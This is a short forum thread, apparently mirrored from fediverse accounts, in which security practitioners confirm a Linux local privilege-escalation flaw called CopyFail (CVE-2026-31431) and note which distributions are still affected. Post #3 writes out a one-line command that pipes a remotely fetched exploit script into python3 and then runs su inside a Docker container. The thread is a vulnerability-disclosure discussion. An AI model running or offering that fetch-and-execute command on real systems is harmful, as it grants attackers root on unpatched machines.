Skip to content
  • Categories
  • Recent
  • Tags
  • Popular
  • World
  • Users
  • Groups
Skins
  • Light
  • Brite
  • Cerulean
  • Cosmo
  • Flatly
  • Journal
  • Litera
  • Lumen
  • Lux
  • Materia
  • Minty
  • Morph
  • Pulse
  • Sandstone
  • Simplex
  • Sketchy
  • Spacelab
  • United
  • Yeti
  • Zephyr
  • Dark
  • Cyborg
  • Darkly
  • Quartz
  • Slate
  • Solar
  • Superhero
  • Vapor

  • Default (Cyborg)
  • No Skin
Collapse
Brand Logo

CIRCLE WITH A DOT

  1. Home
  2. Uncategorized
  3. Yeah I tested CopyFail.

Yeah I tested CopyFail.

Scheduled Pinned Locked Moved Uncategorized
5 Posts 5 Posters 0 Views
  • Oldest to Newest
  • Newest to Oldest
  • Most Votes
Reply
  • Reply as topic
Log in to reply
This topic has been deleted. Only users with topic management privileges can see it.
  • mttaggart@infosec.exchangeM This user is from outside of this forum
    mttaggart@infosec.exchangeM This user is from outside of this forum
    mttaggart@infosec.exchange
    wrote last edited by
    #1

    Yeah I tested CopyFail. It's real. Yikes.

    Link Preview Image
    Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

    CVE-2026-31431 Confirmed the exploit. It’s real.

    favicon

    IFIN (discourse.ifin.network)

    jscybersec@infosec.exchangeJ aburka@hachyderm.ioA agentk@chaos.socialA emily@infosec.exchangeE 4 Replies Last reply
    0
    • mttaggart@infosec.exchangeM mttaggart@infosec.exchange

      Yeah I tested CopyFail. It's real. Yikes.

      Link Preview Image
      Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

      CVE-2026-31431 Confirmed the exploit. It’s real.

      favicon

      IFIN (discourse.ifin.network)

      jscybersec@infosec.exchangeJ This user is from outside of this forum
      jscybersec@infosec.exchangeJ This user is from outside of this forum
      jscybersec@infosec.exchange
      wrote last edited by
      #2

      @mttaggart Can't privesc me if I always run as root!

      1 Reply Last reply
      0
      • mttaggart@infosec.exchangeM mttaggart@infosec.exchange

        Yeah I tested CopyFail. It's real. Yikes.

        Link Preview Image
        Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

        CVE-2026-31431 Confirmed the exploit. It’s real.

        favicon

        IFIN (discourse.ifin.network)

        aburka@hachyderm.ioA This user is from outside of this forum
        aburka@hachyderm.ioA This user is from outside of this forum
        aburka@hachyderm.io
        wrote last edited by
        #3

        @mttaggart tested it in a docker image (used Noble as the LTS releases have patched kernels already):

        ```
        host $ docker run --rm -it ubuntu:noble
        container # apt update && apt install curl python3
        container # su ubuntu
        container $ curl https://copy.fail/exp | python3 && su
        container #
        ```

        I'd say this is a welp of considerable magnitude

        1 Reply Last reply
        0
        • mttaggart@infosec.exchangeM mttaggart@infosec.exchange

          Yeah I tested CopyFail. It's real. Yikes.

          Link Preview Image
          Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

          CVE-2026-31431 Confirmed the exploit. It’s real.

          favicon

          IFIN (discourse.ifin.network)

          agentk@chaos.socialA This user is from outside of this forum
          agentk@chaos.socialA This user is from outside of this forum
          agentk@chaos.social
          wrote last edited by
          #4

          @mttaggart Debian 13 still vulnerable with 6.12.74

          1 Reply Last reply
          0
          • mttaggart@infosec.exchangeM mttaggart@infosec.exchange

            Yeah I tested CopyFail. It's real. Yikes.

            Link Preview Image
            Copy Fail: 732 Bytes to Root on Every Major Linux Distribution

            CVE-2026-31431 Confirmed the exploit. It’s real.

            favicon

            IFIN (discourse.ifin.network)

            emily@infosec.exchangeE This user is from outside of this forum
            emily@infosec.exchangeE This user is from outside of this forum
            emily@infosec.exchange
            wrote last edited by emily@infosec.exchange
            #5

            @mttaggart

            Editing to add:

            RHEL has now updated the severity and the fix is no longer "deferred" for all affected OSes.

            Looks like it requires a local user account, with a password set, to exploit, yes?

            Link Preview Image
            cve-details

            favicon

            (access.redhat.com)

            1 Reply Last reply
            0
            Reply
            • Reply as topic
            Log in to reply
            • Oldest to Newest
            • Newest to Oldest
            • Most Votes


            • Login

            • Login or register to search.
            • First post
              Last post
            0
            • Categories
            • Recent
            • Tags
            • Popular
            • World
            • Users
            • Groups